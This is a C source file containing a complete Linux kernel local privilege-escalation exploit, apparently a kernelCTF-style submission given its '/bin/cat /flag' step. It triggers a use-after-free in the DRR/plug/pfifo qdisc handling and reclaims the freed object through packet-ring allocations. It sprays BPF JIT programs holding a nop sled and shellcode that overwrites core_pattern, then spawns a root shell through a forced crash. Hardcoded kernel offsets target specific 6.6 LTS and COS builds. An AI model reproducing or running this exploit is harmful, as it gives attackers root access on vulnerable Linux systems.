#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <unistd.h>
#include <sched.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <net/if.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/timerfd.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <syscall.h>
#include <sys/mman.h>
#include <netinet/in.h>
#include <linux/if_packet.h>
#include <linux/rtnetlink.h>
#include <linux/pkt_sched.h>
#include <linux/pkt_cls.h>
#include <linux/membarrier.h>
#include <linux/limits.h>
#include <linux/filter.h>

#include "netlink.h"

typedef u_int8_t u8;
typedef u_int16_t u16;
typedef u_int32_t u32;
typedef u_int64_t u64;
typedef int8_t i8;
typedef int16_t i16;
typedef int32_t i32;
typedef int64_t i64;

#define LEN(x) (sizeof(x) / sizeof(x[0]))
#define ASSERT(x) ({ if (!(x)) { err(EXIT_FAILURE, #x); } })
#define SYSCHK(x) ({ typeof(x) __tmp = (x); if (__tmp == (typeof(x))-1) { err(EXIT_FAILURE, #x); } __tmp; })

static void pin_to_cpu(int id) {
	cpu_set_t set;
	CPU_ZERO(&set);
	CPU_SET(id, &set);
	ASSERT(sched_setaffinity(getpid(), sizeof(set), &set) != -1);
}

static void synchronize_rcu() {
  // A synchronize_rcu primitive in userspace: Original idea from https://github.com/lrh2000/StackRot
  if (syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1) < 0) {
    perror("membarrier()");
  }
}

static void set_rlimit_nofile() {
	struct rlimit lim = {};
	ASSERT(!prlimit(0, RLIMIT_NOFILE, NULL, &lim));
	lim.rlim_cur = lim.rlim_max;
	ASSERT(!prlimit(0, RLIMIT_NOFILE, &lim, NULL));
}

#define NETLINK_SEND_CHECK(fd, nlh, max_size) do {\
		ASSERT(!netlink_send(fd, nlh)); \
		ASSERT(netlink_recv(fd, nlh, max_size) > 0); \
		ASSERT(!netlink_errno(nlh)); \
	} while(0);

#if LTS_6_66
const u64 entry_SYSCALL_64 = 0xffffffff82600080;
const u64 core_pattern = 0xffffffff83db6560;
#elif COS_105_17412_495_73
const u64 entry_SYSCALL_64 = 0xffffffff82200080;
const u64 core_pattern = 0xffffffff8379eac0;
#else
#error "unknown version"
#endif

// macro to get the (i)th offset byte for the instruction
// mov sil, <byte>
#define OFF(i) ((((core_pattern - entry_SYSCALL_64) >> (i*8)) & 0xFF) << 16)

// this payload was generated from jit.s using some basic find / replace magic:
// basically does the following:
// core_pattern := "|/proc/%P/exe";
// while (1) {}
struct sock_filter bpf_prog_payload[] = {
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90c931 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90d231 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90c0b1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c18e1c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c9082b1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90320f },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90c931 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c9020b1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3ce2d348 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3cc20148 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90f631 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c00b640 | OFF(3) },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c00b640 | OFF(2) },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c00b640 | OFF(1) },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c00b640 | OFF(0) },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3cf20148 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90c031 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c9004b0 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90f631 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c72b640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c70b640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c2fb640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c7cb640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c903289 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3cc20148 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90f631 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c25b640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c2fb640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c63b640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c6fb640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c903289 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3cc20148 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90f631 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c78b640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c65b640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c2fb640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c08e6c1 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c50b640 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c903289 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3cc20148 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90f631 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c65b640 },
#if 0
	// original infinite loop version
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c903289 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c90feeb },
#endif
	// return NULL
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3c583289 },
	(struct sock_filter){ .code = BPF_LD+BPF_K, .k = 0x3cc3c031 },
};
#define BPF_PROG_PAYLOAD_LEN (sizeof(bpf_prog_payload) / sizeof(struct sock_filter))
// in module_alloc: MODULES_VADDR = 0xffffffffc0000000
//       with KASLR: offset = [1, 1024] * PAGE_SIZE
// ==> allocating more than 1024 pages breaks KASLR completely
// BPF_MAXINSNS = 4096
// bpf allocation does 8 byte header + 16 byte random slide + program size
// with program size ~ headers + N * 2 + M * 5 [rounded to multiple of 64]
//   with N = len of nop sled
//   with M = number of payload instructions
// => N ~ 1880 allocates exactly 1 page for each program
// We want to allocate exactly one page per payload to ensure alignment
#define PROG_LEN (1880 + BPF_PROG_PAYLOAD_LEN)
// spray 3000 pages just to be sure (way more than we need to)
#define N_PROGS 3000
static u64 bpf_payload_location = 0xffffffffc0000000 +
	+ (1024 + 1024 + 123 /* just to be sure */) * 0x1000
	+ 92 /* large enough offset to bypass randomized header len */
	+ 1 /* break alignment to execute _our_ code */;

static void spray_bpf_jit() {
	struct sock_filter filter[PROG_LEN];
	unsigned i = 0;
	for (; i < PROG_LEN - 1; i++) {
		// fill filter with "nop sled"
		//
		// this generates
		// f7 d8	neg eax
		// if we hit this unaligned, we get our "nop":
		// d8 f7	fdiv st,st(7)
		filter[i].code = BPF_ALU | BPF_NEG;

		// why this code and not another one?
		// - bpf_jit_binary_pack_alloc() will add a random offset which is a multiple of 4
		// - bpf function prologue's size is a multiple of 4
		// => by generating nop instructions that are a multiple of 2 we do not break
		//    the alignment and can make sure that we hit the correct "unalignment"
		//    even after randomization
		//    (note that we made sure that all our payloads allocate exactly one page)
	}
	// last opcode needs to be ret.
	filter[i].code = BPF_RET + BPF_K;
	filter[i].k = 0;

	i = PROG_LEN - 1/*ret*/ - BPF_PROG_PAYLOAD_LEN;
	memcpy(&filter[i], bpf_prog_payload, sizeof(bpf_prog_payload));

	// need some opcode which can break out of the nop sled

	// this will be optimized into
	// d1 e8            	shr eax, 1
	filter[i - 3].code = BPF_ALU | BPF_RSH | BPF_K;
	filter[i - 3].k = 1;
	// 05 00 00 00 3c   	add eax, 0x3c000000
	filter[i - 2].code = BPF_ALU | BPF_ADD | BPF_K;
	filter[i - 2].k = 0x3c000000;

	// 05 00 00 00 3c   	add eax, 0x3c000000
	filter[i - 1].code = BPF_ALU | BPF_ADD | BPF_K;
	filter[i - 1].k = 0x3c000000;

	// coming from the unaligned nop-sled this yields:
	//    d8 ..
	//    .. d1            	fcom st(1)
	//    e8 05 00 00 00   	call x
	//    05 ..
	//    3c 00 00 00 ..  	add eax, 0x05
	//  x:	.. 3c ..
	//    b8              	cmb  al, 0xb8
	//    .. payload continues

	struct sock_fprog prog = {
		.len = PROG_LEN,
		.filter = filter,
	};

	int fd;
	for (i = 0; i < N_PROGS; i++) {
		fd = SYSCHK(socket(AF_INET, SOCK_DGRAM, 0));
		ASSERT(setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog)) != -1);

		// leak fd ..
	}
}
//

void ip_link_set_flags(int s, int ifindex, unsigned int ifi_flags, unsigned mtu) {
	u8 buf[1024] = {0};
	struct nlmsghdr* nlh = (void*)buf;

	struct ifinfomsg* data = NLMSG_DATA(nlh);
	nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
	nlh->nlmsg_type = RTM_NEWLINK;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
	nlh->nlmsg_seq = 0;
	nlh->nlmsg_pid = 0;

	data->ifi_family = PF_UNSPEC;
	data->ifi_type = 0;
	data->ifi_index = ifindex;
	data->ifi_flags = ifi_flags;
	data->ifi_change = 1;

	if (mtu) {
		netlink_attr_put(nlh, IFLA_MTU, &mtu, sizeof(mtu));
	}

	NETLINK_SEND_CHECK(s, nlh, sizeof(buf));
}

static void __setup_newqdisc_msg(struct nlmsghdr* nlh, unsigned if_index, unsigned parent, unsigned handle, const char* name) {
	struct tcmsg* data = NLMSG_DATA(nlh);
	nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
	nlh->nlmsg_type = RTM_NEWQDISC;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
	nlh->nlmsg_seq = 0;
	nlh->nlmsg_pid = 0;

	data->tcm_family = PF_UNSPEC;
	data->tcm_ifindex = if_index;
	data->tcm_parent = parent;
	data->tcm_handle = handle & 0xFFFF0000;

	if (name)
		netlink_attr_put(nlh, TCA_KIND, name, strlen(name));
}

static void __setup_newclass_msg(struct nlmsghdr* nlh, unsigned if_index, unsigned parent, unsigned handle, bool create) {
	struct tcmsg* data = NLMSG_DATA(nlh);
	nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
	nlh->nlmsg_type = RTM_NEWTCLASS;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
	nlh->nlmsg_seq = 0;
	nlh->nlmsg_pid = 0;

	if (create)
		nlh->nlmsg_flags |= NLM_F_CREATE;

	data->tcm_family = PF_UNSPEC;
	data->tcm_ifindex = if_index;
	data->tcm_parent = parent;
	data->tcm_handle = parent | (handle & 0xFFFF);
}

static void change_drr_class(int fd, unsigned int if_index, unsigned int parent, unsigned int handle, bool create, u32 quantum) {
	u8 buf[1024] = {0};
	struct nlmsghdr* nlh = (void*)buf;
	__setup_newclass_msg(nlh, if_index, parent, handle, create);

	struct nlattr* n = netlink_nest_begin(nlh, TCA_OPTIONS);
	netlink_attr_append(n, TCA_DRR_QUANTUM, &quantum, sizeof(quantum));
	netlink_nest_end(nlh, n);

	NETLINK_SEND_CHECK(fd, nlh, sizeof(buf));
}

static void delete_class(int fd, unsigned int if_index, unsigned int parent, unsigned int handle) {
	u8 buf[1024] = {0};
	struct nlmsghdr* nlh = (void*)buf;

	struct tcmsg* data = NLMSG_DATA(nlh);
	nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
	nlh->nlmsg_type = RTM_DELTCLASS;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
	nlh->nlmsg_seq = 0;
	nlh->nlmsg_pid = 0;

	data->tcm_family = PF_UNSPEC;
	data->tcm_ifindex = if_index;
	data->tcm_parent = parent;
	data->tcm_handle = parent | (handle & 0xFFFF);

	NETLINK_SEND_CHECK(fd, nlh, sizeof(buf));
}


static void create_qdisc_drr(int fd, unsigned int if_index, unsigned int parent, unsigned int handle, const struct tc_sizespec* stab, const u16* stab_data) {
	u8 buf[1024] = {0};
	struct nlmsghdr* nlh = (void*)buf;
	__setup_newqdisc_msg(nlh, if_index, parent, handle, "drr");

	if (stab) {
		struct nlattr* n = netlink_nest_begin(nlh, TCA_STAB);

		netlink_attr_append(n, TCA_STAB_BASE, stab, sizeof(*stab));
		netlink_attr_append(n, TCA_STAB_DATA, stab_data, stab->tsize * sizeof(u16));

		netlink_nest_end(nlh, n);
	}

	NETLINK_SEND_CHECK(fd, nlh, sizeof(buf));
}

static void create_qdisc_plug(int fd, unsigned if_index, unsigned int parent, unsigned int handle, struct tc_plug_qopt* opt) {
	u8 buf[1024] = {0};
	struct nlmsghdr* nlh = (void*)buf;
	__setup_newqdisc_msg(nlh, if_index, parent, handle, "plug");
	netlink_attr_put(nlh, TCA_OPTIONS, opt, sizeof(*opt));
	NETLINK_SEND_CHECK(fd, nlh, sizeof(buf));
}

static void change_qdisc_plug(int fd, unsigned if_index, unsigned int parent, unsigned int handle, struct tc_plug_qopt* opt) {
	u8 buf[1024] = {0};
	struct nlmsghdr* nlh = (void*)buf;
	__setup_newqdisc_msg(nlh, if_index, parent, handle, "plug");

	nlh->nlmsg_flags &= ~NLM_F_CREATE;

	netlink_attr_put(nlh, TCA_OPTIONS, opt, sizeof(*opt));
	NETLINK_SEND_CHECK(fd, nlh, sizeof(buf));
}

static void create_qdisc_pfifo(int fd, unsigned if_index, unsigned int parent, unsigned int handle) {
	u8 buf[1024] = {0};
	struct nlmsghdr* nlh = (void*)buf;
	__setup_newqdisc_msg(nlh, if_index, parent, handle, "pfifo");
	NETLINK_SEND_CHECK(fd, nlh, sizeof(buf));
}


static void graft_qdisc(int fd, unsigned if_index, unsigned int from, unsigned int to) {
	u8 buf[1024] = {0};
	struct nlmsghdr* nlh = (void*)buf;
	__setup_newqdisc_msg(nlh, if_index, to, 0, NULL);
	((struct tcmsg*)NLMSG_DATA(nlh))->tcm_handle = from;

	nlh->nlmsg_flags &= ~NLM_F_CREATE;
	nlh->nlmsg_flags |= NLM_F_REPLACE;

	NETLINK_SEND_CHECK(fd, nlh, sizeof(buf));
}

static int alloc_pages_via_sock(u32 pages_per_block, u32 num_blocks) {
	struct tpacket_req req;
	int fd, version;

	fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
	if (fd < 0)
		return fd;

	version = TPACKET_V1;

	if (setsockopt(fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version)) < 0)
		goto err;

	memset(&req, 0, sizeof(req));

	req.tp_block_size = pages_per_block * 0x1000;
	req.tp_block_nr = num_blocks;
	req.tp_frame_size = 4096;
	req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

	/*
	Target is af_packet.c:packet_set_ring() -> alloc_pg_vec() where
	    block_nr := num_blocks
	    and
	    order := pages_per_block - 1

	This allocates a kernel memory region filled with pointers to data we
	control of size 8*num_blocks in GFP_KERNEL.

	This is very helpful to fake the qdisc->ops->peek indirection
	*/

	if (setsockopt(fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0)
		goto err;

	return fd;

err:
	close(fd);
	return -1;
}

static void wait_for_core_pattern(int pipefd) {
	char buf[128] = {};

	pin_to_cpu(0);
	ASSERT(read(pipefd, buf, 1) == 1);

	while (1) {
		int core = SYSCHK(open("/proc/sys/kernel/core_pattern", O_RDONLY));
		read(core, buf, sizeof(buf));
		close(core);

		if (strncmp(buf, "|/proc/%P/exe", 13) == 0) {
			asm volatile ("xor %rax, %rax; movq $0, (%rax);");
		}

		usleep(200 * 1000);
	}

	exit(0);
}

int main(int argc, char* argv[]) {
	const unsigned int lo = if_nametoindex("lo");

	const unsigned int qdisc_root = 1 << 16;

	const unsigned int class_drr = 1;
	const unsigned int qdisc_drr = 11 << 16;

	const unsigned int class_fifo_A = 11;
	const unsigned int class_fifo_B = 2;
	const unsigned int qdisc_fifo = 777 << 16;

	const unsigned int class_plug = 3;
	const unsigned int qdisc_plug = 13 << 16;

	const unsigned int class_dummy = 128;

	int nfd;

	if (!getuid()) {
		pid_t pid;
		sscanf(argv[0], "/proc/%u/exe", &pid);

		int pfd = syscall(SYS_pidfd_open, pid, 0);
		int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
		int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
		int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
		dup2(stdinfd,0);
		dup2(stdoutfd,1);
		dup2(stderrfd,2);

		char* shell[] = {
			"/bin/sh",
			"-c",
			"/bin/cat /flag && /bin/sh",
			NULL,
		};
		execve(shell[0], shell, NULL);
		return 0;
	}

	printf("Hello World!\n");

	int pipefds[2];
	ASSERT(!pipe(pipefds));

	pid_t pid = SYSCHK(fork());
	if (!pid) {
		close(pipefds[1]);
		wait_for_core_pattern(pipefds[0]);
	}

	set_rlimit_nofile();

	ASSERT(!unshare(CLONE_NEWUSER | CLONE_NEWNET));

	// do this first to avoid noise later
	spray_bpf_jit();

	nfd = SYSCHK(netlink_open(NETLINK_ROUTE));
	ip_link_set_flags(nfd, lo, IFF_UP, 0);

	struct sockaddr_in addr = {
		.sin_family = AF_INET,
		.sin_port = 0,
		.sin_addr.s_addr = htonl(INADDR_LOOPBACK),
	};
	unsigned len = sizeof(addr);
	int s = SYSCHK(socket(AF_INET, SOCK_DGRAM, 0));

	ASSERT(!bind(s, (struct sockaddr*)&addr, len));
	ASSERT(!getsockname(s, (struct sockaddr*)&addr, &len));

	int c = SYSCHK(socket(AF_INET, SOCK_DGRAM, 0));

	struct tc_plug_qopt plug_opt = {
		.limit = 0xffff // in bytes
	};

	// Need to prepare heap layout on known cores
	pin_to_cpu(0);

	// We create the following qdisc structure:
	// (classes in lower case, qdiscs in UPPER CASE)
	//        DRR'(root)
	//       /    |    \
	//      /     |     \
	//     /      |      \
	//   drr   fifo_B   plug
	//   DRR            PLUG
	//    |
	//  fifo_A
	//   FIFO

	create_qdisc_drr(nfd, lo, TC_H_ROOT, qdisc_root, NULL, NULL);
	change_drr_class(nfd, lo, qdisc_root, class_drr, true, 0x8000);
	{
		// we migrate to another cpu for the class which will be freed later.
		// we want the object to stay untouched and not reclaimed. Thus we try to
		// reduce noise by allocating it from another core.
		pin_to_cpu(1);

		change_drr_class(nfd, lo, qdisc_root, class_fifo_B, true, 0x8000);

		// to additionally protect it, we make sure that the drr class does not belong
		// to the active slab anymore
		// (32 objs per slab for kmalloc-128 where struct drr_class resides)
		for (int i = 0; i < 32; i++) {
			change_drr_class(nfd, lo, qdisc_root, class_dummy + 1 + i, true, 1234);
		}

		pin_to_cpu(0);
	}
	// choose a low quantum here to force re-scheduling of the plug class
	// when we trigger the payload. Additionally reduce risk of triggering
	// list corruption in case something modifies list pointers
	change_drr_class(nfd, lo, qdisc_root, class_plug, true, 1);

	create_qdisc_drr(nfd, lo, qdisc_root | class_drr, qdisc_drr, NULL, NULL);
	create_qdisc_plug(nfd, lo, qdisc_root | class_plug, qdisc_plug, &plug_opt);

	change_drr_class(nfd, lo, qdisc_drr, class_fifo_A, true, 0x8000);
	create_qdisc_pfifo(nfd, lo, qdisc_drr | class_fifo_A, qdisc_fifo);

	// Now, we graft FIFO onto the root qdisc:
	//        DRR'(root)
	//       /    |    \
	//      /     |     \
	//     /      |      \
	//   drr   fifo_B   plug
	//   DRR    FIFO    PLUG
	//    |
	//  fifo_A
	// (this is where the bug resides, FIFO will still have parent drr instead of root)
	graft_qdisc(nfd, lo, qdisc_fifo, qdisc_root | class_fifo_B);

	// .. and delete the drr class:
	//        DRR'(root)
	//            |    \
	//            |     \
	//            |      \
	//         fifo_B   plug
	//          FIFO    PLUG
	delete_class(nfd, lo, qdisc_root, class_drr);

	u8 buf[1] = {};

	// activate plug
	u32 priority = qdisc_root | class_plug;
	ASSERT(!setsockopt(c, SOL_SOCKET, SO_PRIORITY, &priority, sizeof(priority)));
	ASSERT(sendto(c, buf, 1, 0, (struct sockaddr*)&addr, len) > 0);

	// activate fifo
	priority = qdisc_root | class_fifo_B;
	ASSERT(!setsockopt(c, SOL_SOCKET, SO_PRIORITY, &priority, sizeof(priority)));
	ASSERT(sendto(c, buf, 1, 0, (struct sockaddr*)&addr, len) > 0);

	// trigger free into use-after-free
	delete_class(nfd, lo, qdisc_root, class_fifo_B);
	synchronize_rcu();

	// try to reclaim the FIFO qdisc but not its (new) parent class fifo_B
	// struct Qdisc (size = 384) with pfifo->privsize == 0 resides in kmalloc-512, GFP_KERNEL
	// need to overwrite qdisc->ops->peek per drr dequeue operation

	// just enough to go into kmalloc-512
	#define N_BLOCKS ((256 + 8) / 8)

	for (int i = 0; i < 42; i++) {
		int s = SYSCHK(alloc_pages_via_sock(1, N_BLOCKS));
		void* base = SYSCHK(mmap(NULL, 1 * N_BLOCKS * 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, s, 0));

		for (int i = 0; i < N_BLOCKS; i++) {
			// struct Qdisc_ops, we only care about the peek member
			struct {
				u64 _pad[7];
				u64 peek; // struct sk_buff *  (*peek)(struct Qdisc *);
			}* ops = base + i * 0x1000;

			ops->peek = bpf_payload_location;
		}

		munmap(base, 1 * N_BLOCKS * 0x1000);
	}

	// pull trigger by dequeueing packets. This will cause a drr_dequeue on first
	// active class plug. Since its low quantum is exceeded, fifo will be scheduled
	// next and cause our payload to be triggered.

	// need to be on 1 to allow core dump helper to run
	pin_to_cpu(1);
	// start watcher
	ASSERT(write(pipefds[1], "", 1) == 1);

	plug_opt.action = TCQ_PLUG_RELEASE_INDEFINITE;
	change_qdisc_plug(nfd, lo, qdisc_root | class_plug, qdisc_plug, &plug_opt);

	while (1) { sleep(100); }
}
